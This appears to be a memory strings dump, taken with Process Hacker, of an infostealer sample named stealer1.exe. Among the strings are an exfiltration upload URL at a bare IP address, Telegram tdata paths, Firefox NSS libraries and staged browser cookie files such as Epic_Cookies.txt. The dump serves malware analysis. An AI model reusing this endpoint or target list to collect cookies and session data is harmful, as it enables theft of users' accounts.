- http://141.105.71.82/Upload/
- file; filename .zip
- Content-Type: application/octet-stream
- id f9686f36-49cc-4f37-b2a9-b3b0572473cb (original af3c4c9f-8ea3-413f-af4b-5700ee9157bc)
- f9686f36-49cc-4f37-b2a9-b3b0572473cb
- af3c4c9f-8ea3-413f-af4b-5700ee9157bc
- Process Hacker 2.39.124
- Windows NT 6.1 Service Pack 1 (64-bit)
- 8/15/2018 7:26:16 AM
- 0x15b8fc (58): C:\Users\A\AppData\Local\Temp
- 0x15bbec (41): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
- 0x163444 (82): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
- 0x163c10 (41): C:\Users\A\AppData\Local\Temp\nssdbm3.dll
- 0x16ac30 (84): C:\Users\A\AppData\Local\Temp\MSVCP140.dll
- 0x16b044 (24): MSVCP140.dll
- 0x16b0ea (22): RtlInitializeSListHead
- 0x16b370 (22): mozglue.dll
- 0x16b898 (30): C:\Users\A\AppData\Local\Temp\
- 0x16bc96 (62): 8C:\Users\A\AppData\Local\Temp\
- 0x16bec0 (36): C:\Users\A\AppData\Local\Temp\32.zip
- 0x16c2ce (62): 6C:\Users\A\AppData\Local\Temp\
- 0x16c4d8 (40): C:\Users\A\AppData\Local\Temp\result.txt
- 0x16ccf0 (44): C:\Program Files (x86)
- 0x16cef8 (29): C:tdata\D877F783D5D3EF8C\map0
- 0x16d308 (25): C:tdata\D877F783D5D3EF8C0
- 0x16d718 (29): C:tdata\D877F783D5D3EF8C\map1
- 0x16db28 (25): C:tdata\D877F783D5D3EF8C1
- 0x16db64 (138): \Registry\Machine\System\CurrentControlSet\Control\Nls\ExtendedLocale
- 0x16df10 (148): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.EN.DLL
- 0x16e208 (148): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.EN.DLL
- 0x16e338 (60): C:\Users\A\AppData\Local\Temp\
- 0x16e5f0 (98): C:\Program Files (x86)\IEInspector\HTTPAnalyzerF>
- 0x16e748 (60): C:\Users\A\AppData\Local\Temp\
- 0x16e950 (24): C:\Users\A\AppData\Local
- 0x16ea58 (19): 2018-08-15 07-22-39
- 0x16ebe8 (34): C:\Users\A\AppData\Local\Temp\.zip
- 0x16efe0 (144): C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-core-localization-
- 0x16f128 (20): C:\Users\A\Documents
- 0x16f230 (26): C:\Users\A\AppData\Roaming
- 0x16f338 (18): C:\Users\A\Desktop
- 0x16f3ec (66): api-ms-win-core-localization-l1-G
- 0x16f568 (30): C:\Users\A\AppData\Local\Temp\
- 0x16fba4 (12): PQRSTUVWXYZ[
- 0x16fcd8 (104): \Device\HarddiskVolume2\Users\A\Desktop\stealer1.exe
- 0x24ca78 (12): 3++S++
- 0x24d078 (12): 3++S++
- 0x24dcb0 (24): \KnownDlls32
- 0x24dcca (16): glue.dll
- 0x24e4b0 (16): Harddisk
- 0x24e4c8 (16): me2\Wind
- 0x24e676 (16): USERDA~1
- 0x24e68e (18): User Data
- 0x24e790 (16): \Session
- 0x24e7c0 (24): \Sessionvv1\
- 0x24e7e0 (130): \??\C:\Windows\SysWOW64\WindowsPowerShell\v1.0\MSVCP140.dlllC:\W\
- 0x24ece0 (58): C:\Windows\syswow64\ntdll.dll
- 0x24eea2 (15): Wow64ApcRoutine
- 0x24eeb2 (8): xception
- 0x24f1c0 (58): C:\Windows\SYSTEM32\wow64.dll
- 0x281320 (14): =::=::\
- 0x281330 (60): ALLUSERSPROFILE=C:\ProgramData
- 0x28136e (68): APPDATA=C:\Users\A\AppData\Roaming
- 0x2813b4 (96): CommonProgramFiles=C:\Program Files\Common Files
- 0x281416 (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x28148e (96): CommonProgramW6432=C:\Program Files\Common Files
- 0x2814f0 (28): COMPUTERNAME=O
- 0x28150e (70): ComSpec=C:\Windows\system32\cmd.exe
- 0x281556 (38): FP_NO_HOST_CHECK=NO
- 0x28157e (24): HOMEDRIVE=C:
- 0x281598 (34): HOMEPATH=\Users\A
- 0x2815bc (74): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x281608 (30): LOGONSERVER=\\O
- 0x281628 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x2816b4 (72): MpConfig_ProductCodeName=AntiSpyware
- 0x2816fe (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x28176c (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x281814 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x28188c (44): NUMBER_OF_PROCESSORS=4
- 0x2818ba (26): OS=Windows_NT
- 0x2818d6 (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x281a1a (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x281a96 (56): PROCESSOR_ARCHITECTURE=AMD64
- 0x281ad0 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x281b62 (34): PROCESSOR_LEVEL=6
- 0x281b86 (46): PROCESSOR_REVISION=9e09
- 0x281bb6 (52): ProgramData=C:\ProgramData
- 0x281bec (58): ProgramFiles=C:\Program Files
- 0x281c28 (80): ProgramFiles(x86)=C:\Program Files (x86)
- 0x281c7a (58): ProgramW6432=C:\Program Files
- 0x281cb6 (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x281d38 (44): PUBLIC=C:\Users\Public
- 0x281d66 (38): SESSIONNAME=Console
- 0x281d8e (28): SystemDrive=C:
- 0x281dac (42): SystemRoot=C:\Windows
- 0x281dd8 (68): TEMP=C:\Users\A\AppData\Local\Temp
- 0x281e1e (66): TMP=C:\Users\A\AppData\Local\Temp
- 0x281e62 (24): USERDOMAIN=O
- 0x281e7c (20): USERNAME=A
- 0x281e92 (44): USERPROFILE=C:\Users\A
- 0x281ec0 (34): windir=C:\Windows
- 0x281ee4 (46): windows_tracing_flags=3
- 0x281f14 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x2823b0 (38): C:\Users\A\Desktop\
- 0x2825b8 (454): C:\Users\A\Desktop;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x282780 (62): C:\Users\A\Desktop\stealer1.exe
- 0x2827c0 (68): "C:\Users\A\Desktop\stealer1.exe"
- 0x282806 (62): C:\Users\A\Desktop\stealer1.exe
- 0x282846 (30): Winsta0\Default
- 0x282870 (58): C:\Windows\SYSTEM32\ntdll.dll
- 0x2828c0 (38): C:\Windows\system32
- 0x282900 (38): C:\Windows\SYSTEM32
- 0x282b38 (22): C:\Windows\
- 0x282d6c (14): \SYSTEN
- 0x282d9c (14): TEM32\O
- 0x282dd0 (64): C:\Windows\SYSTEM32\wow64win.dll
- 0x282f80 (58): C:\Windows\SYSTEM32\wow64.dll
- 0x2830dc (14): TEM32\N
- 0x28313c (14): 2\wow6H
- 0x283150 (66): \Sessions\1\Windows\ApiPortection
- 0x2831b0 (30): stemFunction035
- 0x2831d0 (16): rogresst
- 0x2831e4 (12): ip.dll
- 0x283340 (64): C:\Windows\SYSTEM32\wow64cpu.dll
- 0x2834a0 (214): \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST
- 0x283580 (20): figuration
- 0x283596 (16): Folders
- 0x283cb8 (238): \Registry\Machine\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST
- 0x330800 (60): ALLUSERSPROFILE=C:\ProgramData
- 0x33083e (68): APPDATA=C:\Users\A\AppData\Roaming
- 0x330884 (108): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x3308f2 (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x33096a (96): CommonProgramW6432=C:\Program Files\Common Files
- 0x3309cc (28): COMPUTERNAME=O
- 0x3309ea (70): ComSpec=C:\Windows\system32\cmd.exe
- 0x330a32 (38): FP_NO_HOST_CHECK=NO
- 0x330a5a (24): HOMEDRIVE=C:
- 0x330a74 (34): HOMEPATH=\Users\A
- 0x330a98 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x330ae4 (30): LOGONSERVER=\\O
- 0x330b04 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x330b90 (72): MpConfig_ProductCodeName=AntiSpyware
- 0x330bda (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x330c48 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x330cf0 (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x330d68 (44): NUMBER_OF_PROCESSORS=4
- 0x330d96 (26): OS=Windows_NT
- 0x330db2 (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x330ef6 (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x330f72 (52): PROCESSOR_ARCHITECTURE=x86
- 0x330fa8 (56): PROCESSOR_ARCHITEW6432=AMD64
- 0x330fe2 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x331074 (34): PROCESSOR_LEVEL=6
- 0x331098 (46): PROCESSOR_REVISION=9e09
- 0x3310c8 (52): ProgramData=C:\ProgramData
- 0x3310fe (70): ProgramFiles=C:\Program Files (x86)
- 0x331146 (80): ProgramFiles(x86)=C:\Program Files (x86)
- 0x331198 (58): ProgramW6432=C:\Program Files
- 0x3311d4 (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x331256 (44): PUBLIC=C:\Users\Public
- 0x331284 (38): SESSIONNAME=Console
- 0x3312ac (28): SystemDrive=C:
- 0x3312ca (42): SystemRoot=C:\Windows
- 0x3312f6 (68): TEMP=C:\Users\A\AppData\Local\Temp
- 0x33133c (66): TMP=C:\Users\A\AppData\Local\Temp
- 0x331380 (24): USERDOMAIN=O
- 0x33139a (20): USERNAME=A
- 0x3313b0 (44): USERPROFILE=C:\Users\A
- 0x3313de (34): windir=C:\Windows
- 0x331402 (46): windows_tracing_flags=3
- 0x331432 (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x331502 (14): h>@0DFp
- 0x331760 (38): C:\Users\A\Desktop\
- 0x331968 (454): C:\Users\A\Desktop;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x331b30 (62): C:\Users\A\Desktop\stealer1.exe
- 0x331b70 (68): "C:\Users\A\Desktop\stealer1.exe"
- 0x331bb6 (62): C:\Users\A\Desktop\stealer1.exe
- 0x331bf6 (30): Winsta0\Default
- 0x331c18 (14): =::=::\
- 0x331c28 (60): ALLUSERSPROFILE=C:\ProgramData
- 0x331c66 (68): APPDATA=C:\Users\A\AppData\Roaming
- 0x331cac (96): CommonProgramFiles=C:\Program Files\Common Files
- 0x331d0e (118): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x331d86 (96): CommonProgramW6432=C:\Program Files\Common Files
- 0x331de8 (28): COMPUTERNAME=O
- 0x331e06 (70): ComSpec=C:\Windows\system32\cmd.exe
- 0x331e4e (38): FP_NO_HOST_CHECK=NO
- 0x331e76 (24): HOMEDRIVE=C:
- 0x331e90 (34): HOMEPATH=\Users\A
- 0x331eb4 (74): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x331f00 (30): LOGONSERVER=\\O
- 0x331f20 (138): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x331fac (72): MpConfig_ProductCodeName=AntiSpyware
- 0x331ff6 (108): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x332064 (166): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x33210c (118): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x332184 (44): NUMBER_OF_PROCESSORS=4
- 0x3321b2 (26): OS=Windows_NT
- 0x3321ce (322): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x332312 (122): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x33238e (56): PROCESSOR_ARCHITECTURE=AMD64
- 0x3323c8 (144): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x33245a (34): PROCESSOR_LEVEL=6
- 0x33247e (46): PROCESSOR_REVISION=9e09
- 0x3324ae (52): ProgramData=C:\ProgramData
- 0x3324e4 (58): ProgramFiles=C:\Program Files
- 0x332520 (80): ProgramFiles(x86)=C:\Program Files (x86)
- 0x332572 (58): ProgramW6432=C:\Program Files
- 0x3325ae (128): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x332630 (44): PUBLIC=C:\Users\Public
- 0x33265e (38): SESSIONNAME=Console
- 0x332686 (28): SystemDrive=C:
- 0x3326a4 (42): SystemRoot=C:\Windows
- 0x3326d0 (68): TEMP=C:\Users\A\AppData\Local\Temp
- 0x332716 (66): TMP=C:\Users\A\AppData\Local\Temp
- 0x33275a (24): USERDOMAIN=O
- 0x332774 (20): USERNAME=A
- 0x33278a (44): USERPROFILE=C:\Users\A
- 0x3327b8 (34): windir=C:\Windows
- 0x3327dc (46): windows_tracing_flags=3
- 0x33280c (138): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x3328a8 (40): C:\Windows\SYSTEM32\
- 0x3328d2 (24): ROCESSOR_IDJ
- 0x3328f0 (38): C:\Windows\syswow64
- 0x332a28 (58): C:\Windows\SysWOW64\ntdll.dll
- 0x332a90 (41): C:\Users\A\AppData\Local\Temp\Vivaldi.txt
- 0x332c98 (64): C:\Windows\syswow64\kernel32.dll
- 0x332d80 (68): C:\Windows\syswow64\KERNELBASE.dll
- 0x332e7f (35): "C:\Users\A\Desktop\stealer1.exe"
- 0x332eb0 (98): C:\Windows\system32;C:\Windows\system;C:\Windows;
- 0x3334a8 (60): C:\Windows\syswow64\USER32.dll
- 0x333588 (58): C:\Windows\syswow64\GDI32.dll
- 0x3336b0 (54): C:\Windows\syswow64\LPK.dll
- 0x3337e8 (58): C:\Windows\syswow64\USP10.dll
- 0x3338b0 (60): C:\Windows\syswow64\msvcrt.dll
- 0x337870 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
- 0x337942 (14): Q!1AQaq
- 0x355710 (64): C:\Windows\syswow64\ADVAPI32.dll
- 0x3557e0 (60): C:\Windows\syswow64\RPCRT4.dll
- 0x3558a8 (62): C:\Windows\syswow64\SspiCli.dll
- 0x355970 (66): C:\Windows\syswow64\CRYPTBASE.dll
- 0x3559c0 (62): C:\Windows\syswow64\SHELL32.dll
- 0x355a08 (62): C:\Windows\SysWOW64\sechost.dll
- 0x355bd0 (62): C:\Windows\syswow64\SHLWAPI.dll
- 0x356098 (62): C:\Windows\syswow64\CRYPT32.dll
- 0x356160 (60): C:\Windows\syswow64\MSASN1.dll
- 0x3568e0 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x357368 (12): PR((*P
- 0x3573e0 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x3581a8 (60): C:\Windows\syswow64\WS2_32.dll
- 0x3581f0 (54): C:\Windows\syswow64\NSI.dll
- 0x358230 (62): C:\Windows\syswow64\WLDAP32.dll
- 0x358278 (64): C:\Windows\syswow64\Normaliz.dll
- 0x3589fe (124): 3system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\SystH
- 0x358ac6 (458): 6ilC:\Users\A\Desktop;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x358cce (14): 5ft\Win
- 0x359546 (28): windir=C:\Wink
- 0x3595ac (120): racing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x359706 (7): \-`([Y%
- 0x35976c (7): }yaIpA
- 0x359e98 (58): C:\Windows\syswow64\MSCTF.dll
- 0x35a0c0 (58): C:\Windows\system32\IMM32.DLL
- 0x35bd90 (27): CryptSIPDllPutSignedDataMsg
- 0x35bde0 (27): CryptSIPDllGetSignedDataMsg
- 0x35be30 (30): CryptSIPDllRemoveSignedDataMsg
- 0x35be80 (29): CryptSIPDllCreateIndirectData
- 0x35bed0 (29): CryptSIPDllVerifyIndirectData
- 0x35bf38 (23): CryptSIPDllIsMyFileType
- 0x35bf80 (23): CertDllVerifyRevocation
- 0x35bfc8 (21): CertDllVerifyCTLUsage
- 0x35c010 (20): CryptDllFormatObject
- 0x35c058 (22): CertDllEnumSystemStore
- 0x35c0a0 (20): CertDllOpenStoreProv
- 0x35c0e8 (20): CryptCNGPKCS12GetMap
- 0x35c130 (16): CryptCNGInitHMAC
- 0x35c178 (20): CryptDllEncodeObject
- 0x35c1c0 (20): CryptDllDecodeObject
- 0x35c208 (22): CryptDllEncodeObjectEx
- 0x35c250 (22): CryptDllDecodeObjectEx
- 0x35c2b8 (58): C:\Windows\syswow64\ole32.dll
- 0x35c300 (62): C:\Windows\system32\version.dll
- 0x35c348 (62): C:\Windows\system32\wsock32.dll
- 0x35c390 (62): C:\Users\A\Desktop\stealer1.exe
- 0x35c440 (22): NUMBER_OF_PROCESSORS=4
- 0x35c488 (26): PROCESSOR_ARCHITECTURE=x86
- 0x35c4d0 (23): PROCESSOR_REVISION=9e09
- 0x35c518 (26): ProgramData=C:\ProgramData
- 0x35c560 (22): PUBLIC=C:\Users\Public
- 0x35c5a8 (21): SystemRoot=C:\Windows
- 0x35c5f0 (22): USERPROFILE=C:\Users\A
- 0x35c638 (23): windows_tracing_flags=3
- 0x35c6a8 (52): C:\Users\A\AppData\Roaming
- 0x35c6f0 (48): C:\Users\A\AppData\Local
- 0x35c7c8 (62): C:\Windows\system32\secur32.dll
- 0x35c8a0 (62): C:\Windows\system32\mswsock.dll
- 0x35c8e8 (60): C:\Windows\System32\wship6.dll
- 0x35c9c0 (60): C:\Windows\system32\DNSAPI.dll
- 0x35ca08 (60): C:\Windows\system32\WINNSI.DLL
- 0x35cc00 (60): C:\Windows\system32\ncrypt.dll
- 0x35cc90 (56): Microsoft Package Negotiator
- 0x35ccd8 (58): NegoExtender Security Package
- 0x35cd20 (60): C:\Windows\SysWOW64\msv1_0.DLL
- 0x35cd68 (58): C:\Windows\SysWOW64\TsPkg.DLL
- 0x35cdb0 (58): C:\Windows\SysWOW64\pku2u.DLL
- 0x35cdf8 (62): C:\Windows\system32\credssp.dll
- 0x35ce40 (62): C:\Windows\system32\credssp.dll
- 0x35ce88 (60): C:\Windows\system32\bcrypt.dll
- 0x35cf20 (24): CryptSIPDllIsMyFileType2
- 0x35cf70 (29): CryptDllExportPublicKeyInfoEx
- 0x35cfc0 (29): CryptDllImportPublicKeyInfoEx
- 0x35d010 (36): CryptDllEncodePublicKeyAndParameters
- 0x35d068 (28): CryptDllConvertPublicKeyInfo
- 0x35d2c8 (41): CryptDllExtractEncodedSignatureParameters
- 0x35d328 (25): CryptDllSignAndEncodeHash
- 0x35d378 (30): CryptDllVerifyEncodedSignature
- 0x35d3e0 (30): CryptDllImportPublicKeyInfoEx2
- 0x35d430 (30): CryptDllExportPublicKeyInfoEx2
- 0x35d480 (26): CertDllOpenSystemStoreProv
- 0x35d4d0 (26): CertDllRegisterSystemStore
- 0x35d520 (28): CertDllUnregisterSystemStore
- 0x35d570 (28): CertDllRegisterPhysicalStore
- 0x35d5c0 (30): CertDllUnregisterPhysicalStore
- 0x35d610 (24): CertDllEnumPhysicalStore
- 0x35d660 (30): CryptDllExportPrivateKeyInfoEx
- 0x35d6b0 (30): CryptDllImportPrivateKeyInfoEx
- 0x35d700 (28): CryptMsgDllCNGExportKeyTrans
- 0x35d750 (28): CryptMsgDllCNGExportKeyAgree
- 0x35d7a0 (28): CryptMsgDllCNGImportKeyTrans
- 0x35d7f0 (28): CryptMsgDllCNGImportKeyAgree
- 0x35d840 (24): CryptMsgDllGenEncryptKey
- 0x35d890 (27): CryptMsgDllExportEncryptKey
- 0x35d8e0 (27): CryptMsgDllImportEncryptKey
- 0x35d930 (31): CryptMsgDllGenContentEncryptKey
- 0x35d980 (25): CryptMsgDllExportKeyTrans
- 0x35d9d0 (25): CryptMsgDllExportKeyAgree
- 0x35da20 (25): CryptMsgDllExportMailList
- 0x35da70 (25): CryptMsgDllImportKeyTrans
- 0x35dac0 (25): CryptMsgDllImportKeyAgree
- 0x35db10 (25): CryptMsgDllImportMailList
- 0x35db38 (64): C:\Windows\syswow64\oleaut32.dll
- 0x35dce8 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x35dd38 (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x35dd88 (35): ComSpec=C:\Windows\system32\cmd.exe
- 0x35ddd8 (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x35de28 (35): ProgramFiles=C:\Program Files (x86)
- 0x35de78 (29): ProgramW6432=C:\Program Files
- 0x35dec8 (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x35df18 (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x35df98 (64): C:\Windows\System32\wshtcpip.dll
- 0x35dfe8 (64): C:\Windows\system32\IPHLPAPI.DLL
- 0x35e0d8 (64): C:\Windows\system32\rasadhlp.dll
- 0x35e128 (64): C:\Windows\System32\fwpuclnt.dll
- 0x35e198 (29): ProgramW6432=C:\Program Files
- 0x35e1e8 (35): ProgramFiles=C:\Program Files (x86)
- 0x35e238 (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x35e288 (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x35e2d8 (35): ComSpec=C:\Windows\system32\cmd.exe
- 0x35e328 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x35e3c8 (46): CryptDllExportPublicKeyInfoFromBCryptKeyHandle
- 0x361ec8 (10): USERNAME=A
- 0x361f50 (36): C:\Users\A\Desktop
- 0x361ff8 (40): C:\Users\A\Documents
- 0x3620a0 (44): C:\Program Files (x86)
- 0x3621f0 (44): Microsoft Unified Security Protocol Provider
- 0x362228 (44): PKU2U Security Package
- 0x362298 (46): LRPC-710cd034e2444564be
- 0x3622d0 (46): Microsoft Kerberos V1.0
- 0x362308 (42): NTLM Security Package
- 0x362418 (35): CertDllVerifyCertificateChainPolicy
- 0x362470 (34): CryptMsgDllCNGGenContentEncryptKey
- 0x3624c8 (37): CryptMsgDllCNGImportContentEncryptKey
- 0x362a0d (6): r,t8*6
- 0x362a34 (7): r,t`*6
- 0x362afd (6): r,t(+6
- 0x362b25 (6): r,tP+6
- 0x362b4d (6): r,tx+6
- 0x362c14 (7): @s,th,6
- 0x362c38 (31): C:\Users\A\Desktop\stealer1.exe
- 0x362df0 (222): C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\
- 0x362ed8 (246): C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
- 0x363008 (142): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.dll
- 0x363130 (15): Winsta0\Default
- 0x363190 (14): AppData
- 0x3631a8 (14): Desktop
- 0x3631c0 (14): Desktop
- 0x3640ee (26): =C:\Program F
- 0x3641aa (26):
- 0x364228 (24):
- 0x364241 (8):
- 0x36428a (26): abcdefghijklmnopqrstuvwxyz
- 0x3642aa (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
- 0x364388 (31): C:\Users\A\Desktop\stealer1.exe
- 0x3643d8 (14): COMPUTERNAME=O
- 0x3643f8 (104): C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL
- 0x365ad8 (30): AppData\Roaming
- 0x365b00 (26): Local AppData
- 0x365b28 (26): AppData\Local
- 0x365b50 (24): ProgramFiles
- 0x365b78 (30): ProgramFilesX86
- 0x365de0 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x365e48 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x365eb0 (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x365f10 (19): FP_NO_HOST_CHECK=NO
- 0x365f50 (12): HOMEDRIVE=C:
- 0x365f90 (17): HOMEPATH=\Users\A
- 0x365fd0 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x366028 (15): LOGONSERVER=\\O
- 0x366068 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x3660e0 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x366138 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x3661a0 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x366208 (13): OS=Windows_NT
- 0x366248 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x366318 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x366388 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x366400 (17): PROCESSOR_LEVEL=6
- 0x366440 (40): ProgramFiles(x86)=C:\Program Files (x86)
- 0x366498 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x366508 (19): SESSIONNAME=Console
- 0x366548 (14): SystemDrive=C:
- 0x366588 (12): USERDOMAIN=O
- 0x3665c8 (17): windir=C:\Windows
- 0x366608 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x366ea2 (106): 6\Device\HarddiskVolume2\Users\A\Desktop\stealer1.exe
- 0x3675d0 (82): @%SystemRoot%\system32\shell32.dll,-21769
- 0x367630 (78): %SystemRoot%\system32\imageres.dll,-183
- 0x3676a8 (16): Personal
- 0x3676c8 (18): Documents
- 0x3676e8 (158): ::{59031a47-3f72-44a7-89c5-5595fe6b30ee}\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}
- 0x367790 (82): @%SystemRoot%\system32\shell32.dll,-21770
- 0x3677f0 (78): %SystemRoot%\system32\imageres.dll,-112
- 0x3678e0 (14): COMPUTERNAME=O
- 0x3679a0 (13): OS=Windows_NT
- 0x3679e0 (17): PROCESSOR_LEVEL=6
- 0x367a20 (19): SESSIONNAME=Console
- 0x367b60 (17): HOMEPATH=\Users\A
- 0x367be0 (12): USERDOMAIN=O
- 0x367c20 (12): HOMEDRIVE=C:
- 0x367d00 (50): Schannel Security Package
- 0x367d40 (50): Schannel Security Package
- 0x367e20 (15): LOGONSERVER=\\O
- 0x367ee0 (19): FP_NO_HOST_CHECK=NO
- 0x367f80 (54): TS Service Security Package
- 0x367fe0 (14): SystemDrive=C:
- 0x368660 (17): windir=C:\Windows
- 0x368868 (82): @%SystemRoot%\system32\shell32.dll,-21781
- 0x3688e8 (82): @%SystemRoot%\system32\shell32.dll,-21817
- 0x368dc0 (38): C:\Windows\rescache
- 0x368ee0 (34): protected_storage
- 0x368fd0 (33): Digest Authentication for Windows
- 0x3690a2 (14): 6GSSAPI
- 0x3698b4 (20): sr-Latn-CS
- 0x369906 (16): qps-ploc
- 0x369918 (18): qps-plocm
- 0x36995c (16): 52C64B7E
- 0x36a216 (30): tzres.dll,-212
- 0x36a256 (42): Pacific Standard Time
- 0x36a296 (30): @tzres.dll,-211
- 0x36a2d6 (42): Pacific Daylight Time
- 0x36a3f8 (38): C:\Users\A\AppData\Local\Temp\body.out
- 0x36a7b8 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
- 0x36a9e0 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
- 0x36ac08 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
- 0x36ae30 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
- 0x36b058 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
- 0x36b280 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
- 0x36b4a8 (46): C:\Users\A\AppData\Local\Temp\Epic_Cookies.txt
- 0x36b6d0 (48): C:\Users\A\AppData\Local\Temp\CocCoc_Cookies.txt
